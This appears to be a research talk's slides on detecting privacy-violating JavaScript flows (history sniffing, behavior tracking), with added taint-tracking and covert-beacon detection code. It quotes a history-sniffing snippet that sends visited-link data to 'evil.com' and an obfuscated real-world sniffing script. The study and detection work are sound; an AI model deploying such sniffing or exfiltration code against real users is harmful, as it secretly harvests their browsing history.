
An Empirical Study of Privacy-Violating Information Flows in JavaScript Web Applications

Dongseok Jang, Ranjit Jhala, Sorin Lerner, Hovav Shacham

UC San Diego

Motivation

  document.location  ✗ Location Hijacking / Phishing
  document.cookie    ✗ Cookie Stealing / Identity Theft
  Visited vs. not-visited link styling, readable from JavaScript  ✗ History Sniffing
  "See absolutely everything visitors do on your webpage. …"  ✗ Behavior Tracking

Plenty of Mischief Possible!

How Prevalent Are Malicious Flows?

How to Detect Malicious Flows?

Outline
  Motivation
  Flow Policies
  Dynamic Flow Tracking
  Flows in the Wild
  Conclusions

Flow Policies

Specify different types of flows

Policies: History Sniffing

  1. Create an (invisible) link to a.com: its color depends on history
  2. Inspect the link's color style property: the color says whether the link was visited
  3. Send the sniffed info over the network

Policies: History Sniffing

  link = createLink("facebook.com");
  style = doc.getStyle(link);
  visited = style.color == "purple";
  send("evil.com", "facebook=" + visited);

Inject taints (at confidential sources): the value returned by doc.getStyle(link) is tainted.

Propagate taints (at assignments, etc.): the taint carries from style to style.color, into the comparison style.color == "purple", into visited, and into "facebook=" + visited; a variant that sends "cr=" + color is reached the same way.

Block taints (at untrusted sinks): send("evil.com", "facebook=" + visited) is blocked because its second argument is tainted.

Flow Policies: Inject / Block

  at doc.getStyle($1) if isLink($1) inject "secret"
    Taint style with "secret"

  at send($1, $2) block "secret" on $2
    Block tainted values to third party

General form:
  at Site if Cond inject Taint
  at Site block Taint on Param

Flow Policies: Expressive
  History Sniffing
  Behavior Tracking
  Cookie Stealing
  Location Hijacking
  …


Dynamic Flow Tracking: Rewrite JS code to carry taints

  Source code → Parse → AST → Rewrite AST → Execute
  Dynamic eval: code produced at run time goes back through Parse and Rewrite [Chander et al POPL 07]

  Rewriting adds .taint fields to values and inserts the calls that inject, propagate and block taints, so the rewritten code carries taints itself.

Rewriting Issues
  Boxing / Unboxing
  Indirect Flows
  Dynamic Eval

Implemented in Chrome/V8

Dynamic Flow Tracking: Performance (Overhead)

Performance: Policies
  Cookie confidentiality: cookie doesn't flow to 3rd-party code
  Location integrity: location unaffected by 3rd-party code

Performance: Benchmark
  10 sites with the largest JS code base in Alexa top 100
  15 – 31 Kloc (avg. 21 Kloc)

Performance: Figures
  Timing overheads: page load (avg: 2x), JS execution (avg: 3x)

Performance: Upshot
  High for online use; acceptable for an offline survey


Flows "In the Wild"
  History Sniffing
  Behavior Tracking

History Sniffing: Figures
  Alexa Top 50,000 sites
  63 sites reported as sending history over network
  46 sites were real cases
  1 site in Alexa Top 100

History Sniffing: Example (1 site in Alexa Top 100)

  var k = {0:"qpsoivc/dpn", 1:"sfeuvcf/dpn", 2:"bevmugsjfoegfs/dpn" ...};   // encrypted URLs
  var g = [];
  for (var m in k) {
    var d = k[m];
    var a = "";
    for (f = 0; f < d.length; f++)                                          // decrypt URL
      a += String.fromCharCode(d.charCodeAt(f) - 1)
    var h = false;
    for (var j in { "http://":"", "http://www.":"" }) {
      var l = document.createElement("a");                                  // create link
      l.href = j + a;
      document.getElementById("ol").appendChild(l);
      var e = document.getComputedStyle(l).getPropertyValue("color")       // inspect color
      if (e == "rgb(12, 34, 56)" || e == "rgb(12,34,56)") { h = true }
    }
    if (h) { g.push(m) }
  }

History Sniffing: Real Cases

  Rank  Site           Desc     Src          Inspected URLs
  61    youporn        adult    youporn      pornhub, tube8, +21
  867   charter.net    news     interclick   cars, edmunds, +46
  2333  feedjit        traffic  feedjit      twitter, facebook, +6
  2415  gamestorrents  game     meaningtool  amazon, ebay, +220
  2811  newsmax        news     interclick   cars, edmunds, +46
  3508  namepros       forum    feedjit      twitter, facebook, +6
  3603  fulltono       music    meaningtool  amazon, ebay, +220
  4266  youporngay     adult    youporngay   pornhub, tube8, +21
  4581  osdir          tech     interclick   cars, edmunds, +46
  5233  gamesfreak     game     interclick   cars, edmunds, +46

  + 36 more cases…

Inclusion chains called out on the slide:
  charter.net → doubleclick.net → interclick
  gamestorrents → harrenmedianetwork → meaningtool

History Sniffing: Upshot
  # of sniffed URLs: 8 to 222
  Of the 46 real cases: 39 had third-party sniffing code, 7 had home-grown code
  Obfuscated sniffing code; code was generated at runtime

Malicious Flows "In the Wild"
  History Hijacking
  Behavior Tracking

Behavior Tracking
  Log user behavior by JS event handlers
  Send the log back to the website

Behavior Tracking: Policy

  while (1) {
    e = getEvent();
    if (e.isMouseOver()) onMouseOver(e);
    if (e.isClick()) onClick(e);
    ...
  }
  onMouseOver = function(event) { isMouseOver = true; }

  at $1.isMouseOver() inject "secret"
  at $1.isClick() inject "secret"
  …

The constant true that the handler stores is written only because e.isMouseOver() held, so it reveals the event and must inherit the "secret" taint injected at e.isMouseOver(): an indirect flow.
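The following is an added example, written for this page and not the paper's V8 implementation: a miniature taint runtime of the kind the rewritten JavaScript would call into. It serves the Flow Policies slides (the "at Site if Cond inject Taint" / "at Site block Taint on Param" forms), the Dynamic Flow Tracking slides (boxing values with a taint field, inject/propagate/block) and the Behavior Tracking policy just above (an indirect flow through a branch condition). The names box, unbox, prop, assign, branch, source and sink, the policy table layout, and the fake DOM and network (createLink, getStyle, send, visitedHistory) are all this example's own assumptions.

```javascript
// Added example, not the paper's V8 implementation: a miniature taint runtime of
// the kind rewritten JavaScript would call into. Values are boxed as {v, t} where
// t is the set of taint labels (the deck's ".taint field"); a policy table injects
// labels at sources, operators/assignments propagate them, and sinks block them.
// box/unbox/prop/assign/branch/source/sink and the fake DOM are this example's names.

const box = (v, t = new Set()) => ({ v, t: new Set(t) });
const isBox = (x) => x !== null && typeof x === "object" && x.t instanceof Set;
const unbox = (x) => (isBox(x) ? x.v : x);
const taintsOf = (x) => (isBox(x) ? x.t : new Set());
const union = (...sets) => new Set(sets.flatMap((s) => [...s]));

// Policy table in the deck's two forms:
//   at Site if Cond inject Taint      /      at Site block Taint on Param
const policy = {
  inject: [
    { site: "getStyle", cond: (args) => isLink(args[0]), taint: "secret" },
    { site: "isMouseOver", cond: () => true, taint: "secret" },
    { site: "isClick", cond: () => true, taint: "secret" },
  ],
  block: [{ site: "send", taint: "secret", param: 1 }], // param 1 is $2
};

const pcStack = [];  // taints of enclosing branch conditions (for indirect flows)
const blocked = [];  // record of blocked sink calls: what a survey would report
const pcTaint = () => union(...pcStack);

// Propagate: the result of op(a, b) carries both operands' taints plus the pc taint.
function prop(op, a, b) {
  return box(op(unbox(a), unbox(b)), union(taintsOf(a), taintsOf(b), pcTaint()));
}
// An assignment made inside a branch inherits the branch condition's taint.
function assign(x) { return box(unbox(x), union(taintsOf(x), pcTaint())); }
// Run thenFn/elseFn under a branch on the boxed condition `cond`.
function branch(cond, thenFn, elseFn) {
  pcStack.push(taintsOf(cond));
  try { return unbox(cond) ? thenFn() : elseFn && elseFn(); }
  finally { pcStack.pop(); }
}
// Source call: evaluate, then inject the labels whose policy condition holds.
function source(site, fn, ...args) {
  const raw = args.map(unbox);
  let t = pcTaint();
  for (const r of policy.inject) if (r.site === site && r.cond(raw)) t = union(t, [r.taint]);
  return box(fn(...raw), t);
}
// Sink call: refuse if the guarded parameter carries a blocked label.
function sink(site, fn, ...args) {
  for (const r of policy.block) {
    if (r.site === site && taintsOf(args[r.param]).has(r.taint)) {
      blocked.push({ site, taint: r.taint, arg: unbox(args[r.param]) });
      return false;
    }
  }
  fn(...args.map(unbox));
  return true;
}

// Constructed stand-ins for the DOM and the network (not browser APIs).
const visitedHistory = new Set(["facebook.com"]);
const isLink = (x) => x !== null && typeof x === "object" && x.tag === "a";
const createLink = (host) => ({ tag: "a", href: host });
const getStyle = (el) => ({ color: visitedHistory.has(el.href) ? "purple" : "blue" });
const netLog = [];
const send = (host, data) => { netLog.push({ host, data }); };

// The deck's history-sniffing snippet in rewritten, taint-carrying form.
function historySniff() {
  blocked.length = 0;
  const link = createLink("facebook.com");
  const style = source("getStyle", getStyle, link);            // inject "secret"
  const color = prop((s, k) => s[k], style, box("color"));     // propagate
  const visited = prop((c, p) => c === p, color, box("purple"));
  const msg = prop((a, b) => a + b, box("facebook="), visited);
  return sink("send", send, box("evil.com"), msg);             // block
}

// The deck's behavior-tracking handler: `true` is stored only when
// e.isMouseOver() held, so it inherits that taint (indirect flow).
function behaviorTrack() {
  blocked.length = 0;
  let isMouseOver = box(false);
  const e = { isMouseOver: () => true };
  branch(source("isMouseOver", e.isMouseOver), () => { isMouseOver = assign(box(true)); });
  return sink("send", send, box("tracker.example"), isMouseOver);
}

// A flow the policy permits: untainted page data to the same third party.
function benignSend() {
  blocked.length = 0;
  const msg = prop((a, b) => a + b, box("lang="), box("en"));
  return sink("send", send, box("evil.com"), msg);
}

console.log({ historySniff: historySniff(), behaviorTrack: behaviorTrack(), benignSend: benignSend() });
```

Both policy violations are refused at the sink while the untainted send passes; the pc-taint stack is what makes the stored constant true in behaviorTrack carry the label even though no tainted value is ever assigned to it directly, which is the Indirect Flows issue the rewriting slides list.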

Behavior Tracking: Figures
  Alexa Top 1300 sites
  328 sites sent behavior
  115 sites sent behavior covertly
  10 sampled for manual inspection
  7 manually reconstructed flow

Method: automatically trigger JS event handlers; many flows are user-visible (image swapping)
Covert filter: response < 100 bytes
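As an added example (not the paper's crawler), the survey method above run on a constructed page: every registered handler is fired with a synthetic event, each network send it causes is recorded with a made-up response size, and the covert filter keeps the sends answered with fewer than 100 bytes. The element ids, destinations, response sizes and the helper names (buildPage, triggerAll, covertSends, survey) are all assumptions of this example.

```javascript
// Added example, not the paper's crawler: the survey's behavior-tracking method on
// a constructed page. Every registered handler is fired with a synthetic event,
// each network send it causes is recorded with a (constructed) response size, and
// the covert filter keeps sends answered with fewer than 100 bytes. All element,
// destination and response values here are made up for the example.

const COVERT_MAX_BYTES = 100;

// Constructed network: destination -> size of the response in bytes.
const fakeResponses = new Map([
  ["img.site-a.test/hover.png", 18342], // image swap: user-visible content
  ["stats.site-a.test/beacon", 43],     // tiny acknowledgement
  ["t.tracker.test/collect", 0],        // empty reply
  ["api.site-b.test/menu.json", 2201],  // real content
]);
const netLog = [];
function send(dest, data) {
  const bytes = fakeResponses.has(dest) ? fakeResponses.get(dest) : 0;
  netLog.push({ dest, data, bytes });
}

// Constructed page: elements with the handlers a page would register.
function buildPage() {
  return [
    { id: "banner", onmouseover: () => send("img.site-a.test/hover.png", "") },
    { id: "login", onclick: (e) => send("stats.site-a.test/beacon", "ev=" + e.type + "&id=login") },
    { id: "article", onclick: (e) => send("t.tracker.test/collect", "ev=" + e.type) },
    { id: "menu", onclick: () => send("api.site-b.test/menu.json", "") },
    { id: "footer" }, // no handlers
  ];
}

// Crawler step: trigger every handler automatically, as the survey did.
function triggerAll(page, events = ["click", "mouseover"]) {
  netLog.length = 0;
  for (const el of page) {
    for (const ev of events) {
      const handler = el["on" + ev];
      if (typeof handler === "function") handler({ type: ev, target: el.id });
    }
  }
  return netLog.slice();
}

// Covert filter: a response too small to be content the user sees.
const covertSends = (log) => log.filter((r) => r.bytes < COVERT_MAX_BYTES);

function survey() {
  const log = triggerAll(buildPage());
  const covert = covertSends(log);
  return { sends: log.length, covert: covert.length, covertDests: covert.map((r) => r.dest) };
}

console.log(survey());
```

The image swap and the menu fetch are dropped by the filter because their responses are real content; the two beacons survive. The threshold is a heuristic, as the deck's "10 sampled for manual inspection" step acknowledges, so a sub-100-byte response is a candidate for manual reconstruction, not a confirmed flow.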

Behavior Tracking: Real Cases

  Rank  Site         Desc      Events
  3     youtube      media     click
  11    yahoo.co.jp  portal    click
  15    sina.com.cn  portal    click
  19    microsoft    software  click, mouseover
  34    mail.ru      email     click
  53    soso         search    click
  65    about        search    click

Third-party source called out on the slide: webtrends.com


Conclusions
  Flows occur in the wild: real cases for further study
  Dynamic approach is required: obfuscated & dynamically generated code

Future work
  Larger scale study on flows: deeper crawl & other types of flow
  Bullet-proof protection tool: policy enforcement without much slowdown & many false alarms

Thank you!
